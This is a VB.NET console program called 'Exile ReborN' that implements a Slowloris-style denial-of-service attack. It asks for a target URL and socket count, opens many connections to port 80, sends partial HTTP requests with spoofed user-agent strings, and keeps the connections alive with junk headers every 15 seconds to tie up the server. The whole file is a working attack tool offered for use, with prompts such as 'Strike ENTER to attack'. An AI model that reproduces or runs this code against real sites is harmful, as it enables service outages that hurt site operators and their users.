Imports System.IO
Imports System.Net
Imports System.Net.Sockets
Imports System.Threading

Module Module1
    Public url As Uri
    Public domain, eip As String
    Public spawn As Integer
    Public waveOne As Boolean = False
    Public allSocks As List(Of TcpClient) = New List(Of TcpClient)
    Public agentsX As New List(Of String)({
"Mozilla/5.0 (Linux; U; Android 9.0.0; en-us; TIVO STREAM 4K Build/KOT49H)",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060427 Camino/1.0.1",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4",
"Mozilla/5.0 (PlayStation; PlayStation 5/2.26) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15",
"Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5",
"Mozilla/5.0 (Linux; Android 11; Nokia G10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Mobile Safari/537.36",
"Mozilla/5.0 (Nintendo Switch; WifiWebAuthApplet) AppleWebKit/601.6 (KHTML, like Gecko) NF/4.0.0.5.10 NintendoBrowser/5.1.0.13343",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; XBOX_ONE_ED) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
"Mozilla/5.0 (Linux; Android 11; SM-M127N) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/80.0.3987.119 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; Tizen 2.3; SmartHub; SMART-TV; SmartTV; U; Maple2012) AppleWebKit/538.1+ (KHTML, like Gecko) TV Safari/538.1+",
"Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4",
"Mozilla/5.0 (X11; U; ExileOS i686; ru-RU) Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4",
"Mozilla/4.8 (X11; U; AnonymousOS i686; ru-RU; rv:1.3.3.7) Gecko/20020920 Netscape/7.0",
"AppleCoreMedia/1.0.0.12B466 (Apple TV; U; CPU OS 8_1_3 like Mac OS X; en_us)",
"Mozilla/5.0 (Apple Watch5,9; CPU Apple Watch WatchOS like Mac OS X; WatchApp",
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
"Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)",
"Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)",
"Googlebot/2.1 (http://www.googlebot.com/bot.html)",
"Haystack TV/20 (Apple TV; iOS 10.1; Scale/1.00)",
"Opera/9.51 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.52 (X11; Linux x86_64; U; ru)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)"})
    Sub Main()
        Console.Title = "Exile ReborN  -  Coded by ShadowMessiah"
        Console.ForegroundColor = ConsoleColor.DarkGray
        Console.WriteLine("")
        Console.WriteLine("       ███████╗██╗  ██╗ ██╗ ██╗     ███████╗")
        Console.WriteLine("      ██╔═════╝██║██╔═╝██╔╝██╔╝    ██╔═════╝")
        Console.WriteLine("     █████╗    ███╔═╝ ██╔╝██╔╝    █████╗    ")
        Console.WriteLine("    ██╔═══╝  ██╔██║  ██╔╝██╔╝    ██╔═══╝    ")
        Console.WriteLine("   ███████╗██╔═╝██║ ██╔╝███████╗███████╗    ")
        Console.WriteLine("   ╚══════╝╚═╝  ╚═╝ ╚═╝ ╚══════╝╚══════╝    
")
        Console.ForegroundColor = ConsoleColor.White


        Console.Write("   Target URL: ")
        Dim targ As String = Console.ReadLine()

        If Not targ.StartsWith("http://") Or targ.StartsWith("https://") Then
            targ = "http://" + targ
        End If
        url = New Uri(targ)
        domain = url.Host

        Console.Write("   Socket count (default 150): ")
        spawn = Int(Console.ReadLine())
        spawn += 1

        Dim hostname As IPHostEntry = Dns.GetHostByName(domain)
        Dim ip As IPAddress() = hostname.AddressList
        eip = ip(0).ToString()

        Console.WriteLine("   Ready? Strike ENTER to attack, and again to exit...")
        Console.ReadLine()

        Dim attackThread As New Thread(Sub() attack())
        attackThread.Start()
        Console.ReadLine()

        attackThread.Abort()
        Environment.Exit(0)
    End Sub

    Public Function genJunk(MinLength As Integer, MaxLength As Integer) As String
        Static rnd As New Random()
        Dim validchars() As Char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLOMNOPQRSTUVWXYZ0123456789".ToCharArray()
        Dim res As String = ""
        For i As Integer = 0 To rnd.Next(MinLength - 1, MaxLength)
            res += validchars(rnd.Next(0, validchars.Length))
        Next
        Return res
    End Function

    Private Sub attack()
        'Build socket(s)
        For i As Integer = 1 To spawn - 1
            Dim newSock As TcpClient = New TcpClient()
            allSocks.Add(newSock)
            Console.WriteLine("   Building socket [" + i.ToString + "]")
        Next i
        Console.WriteLine("")

        'Generate header information
        Do
            'Loop through socket(s)
            Dim allBytes As Integer = 0
            For Each sendSock As TcpClient In allSocks
                If sendSock.Connected = True Then
                    Try
                        'Send junk header through already-connected socket
                        Dim nxt As String = "X-a: b"
                        Dim moreJunk As String = genJunk(15, 35)
                        nxt = nxt + moreJunk

                        Dim streamWriter As StreamWriter = New StreamWriter(sendSock.GetStream())
                        streamWriter.Write(nxt)
                        streamWriter.Flush()

                        Dim addBytes As String = System.Text.ASCIIEncoding.Unicode.GetByteCount(nxt)
                        allBytes += addBytes
                    Catch ex As Exception
                        'Do nothing
                    End Try
                Else
                    Try
                        'Establish/re-establish a socket connection / send original header data
                        sendSock.Connect(eip, 80)

                        Dim param As String = genJunk(30, 70)

                        Dim Rand As New Random()
                        Rand.Next()
                        Dim lstIndex As Integer = Rand.Next(0, agentsX.Count)
                        Dim agent As String = agentsX(lstIndex)

                        Dim streamWriter As StreamWriter = New StreamWriter(sendSock.GetStream())
                        Dim header As String = String.Concat("GET /?" & param & " HTTP/1.1" & vbCrLf & "Host:" & domain & vbCrLf & "User-agent: " & agent & vbCrLf & "Connection: Keep-Alive" & vbCrLf & "Content-Length: 42")
                        streamWriter.Write(header)
                        streamWriter.Flush()

                        Dim addBytes As String = System.Text.ASCIIEncoding.Unicode.GetByteCount(header)
                        allBytes += addBytes
                    Catch ex As Exception
                        'Do nothing
                    End Try
                End If
            Next

            Console.WriteLine("
   Sent " + allBytes.ToString + " byte(S) successfully!")

            Console.WriteLine("


            Sleeping for 15000 milliseconds...")
            Thread.Sleep(15000)
        Loop
    End Sub
End Module
